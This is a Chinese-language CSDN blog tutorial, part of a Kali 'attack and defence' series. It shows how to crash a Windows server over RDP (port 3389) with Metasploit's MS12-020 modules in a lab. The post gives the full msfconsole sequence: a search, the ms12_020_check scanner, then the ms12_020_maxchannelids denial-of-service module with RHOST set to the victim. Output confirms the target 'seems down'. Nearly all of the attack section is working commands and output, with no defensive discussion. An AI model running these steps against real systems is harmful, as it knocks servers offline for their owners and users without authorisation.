kali攻防第12章 Metasploit之服务器蓝屏攻击

最新推荐文章于 2024-06-01 21:44:32 发布

置顶随行之旅

最新推荐文章于 2024-06-01 21:44:32 发布

阅读量1.4w

点赞数 1

分类专栏：安全攻防之旅

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/strom2418/article/details/50392348

版权

安全攻防之旅专栏收录该内容

15 篇文章 9 订阅

订阅专栏

Metasploit之服务器蓝屏攻击

准备工具

1、kali 系统 IP：10.10.10.131

2、受害者机子 IP： 10.10.10.130

3、工具 Metasploit

4、服务器开启3389端口

步骤：

1、进入Metasploit控制台

root@kali:~# msfconsole

IIIIII dTb.dTb _.---._

II 4' v 'B .'"".'/|\`.""'.

II 6. .P : .' / | \ `. :

II 'T;. .;P' '.' / | \ `.'

II 'T; ;P' `. / | \ .'

IIIIII 'YvP' `-.__|__.-'

I love shells --egypt

Save 45% of your time on large engagements with Metasploit Pro

Learn more on http://rapid7.com/metasploit

=[ metasploit v4.11.5-2015103001 ]

+ -- --=[ 1500 exploits - 864 auxiliary - 251 post ]

+ -- --=[ 432 payloads - 37 encoders - 8 nops ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

2、查看受害者机子是否开启3389端口

3、扫描漏洞（查看远程服务可以利用的模块）

msf > search ms12-020

[!] Module database cache not built yet, using slow search

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal MS12-020 Microsoft Remote Desktop Use-After-Free DoS

auxiliary/scanner/rdp/ms12_020_check normal MS12-020 Microsoft Remote Desktop Checker

4、载入漏洞模块

msf > use auxiliary/scanner/rdp/ms12_020_check

msf auxiliary(ms12_020_check) >

msf auxiliary(ms12_020_check) > show options

Module options (auxiliary/scanner/rdp/ms12_020_check):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOSTS yes The target address range or CIDR identifier

RPORT 3389 yes Remote port running RDP

THREADS 1 yes The number of concurrent threads

5、设置攻击的IP地址

msf auxiliary(ms12_020_check) > set RHOSTS 10.10.10.130

RHOSTS => 10.10.10.130

msf auxiliary(ms12_020_check) > show options

Module options (auxiliary/scanner/rdp/ms12_020_check):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOSTS 10.10.10.130 yes The target address range or CIDR identifier

RPORT 3389 yes Remote port running RDP

THREADS 1 yes The number of concurrent threads

6、执行查看攻击模块

msf auxiliary(ms12_020_check) > exploit

[+] 10.10.10.130:3389 - The target is vulnerable.

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

7、更换模块查看

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 3389 yes The target port

msf auxiliary(ms12_020_maxchannelids) > set RHOST 10.10.10.130

RHOST => 10.10.10.130

msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 10.10.10.130 yes The target address

RPORT 3389 yes The target port

8、执行攻击（受害者机子会蓝屏）

msf auxiliary(ms12_020_maxchannelids) > exploit

[*] 10.10.10.130:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS

[*] 10.10.10.130:3389 - 210 bytes sent

[*] 10.10.10.130:3389 - Checking RDP status...

[+] 10.10.10.130:3389 seems down

[*] Auxiliary module execution completed

9、查看受害者机子状态

关注

1
点赞
踩
43

收藏

觉得还不错? 一键收藏
打赏
0
评论
kali攻防第12章 Metasploit之服务器蓝屏攻击

Metasploit之服务器蓝屏攻击准备工具1、kali 系统 IP：10.10.10.1312、受害者机子 IP： 10.10.10.1303、工具 Metasploit4、服务器开启3389端口步骤：1、进入Metasploit控制台root@kali:~# msfconsole
复制链接

扫一扫

专栏目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

打赏作者

随行之旅 python国产化自动化

¥1 ¥2 ¥4 ¥6 ¥10 ¥20

扫码支付：¥1

获取中

扫码支付

您的余额不足，请更换扫码支付或充值

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。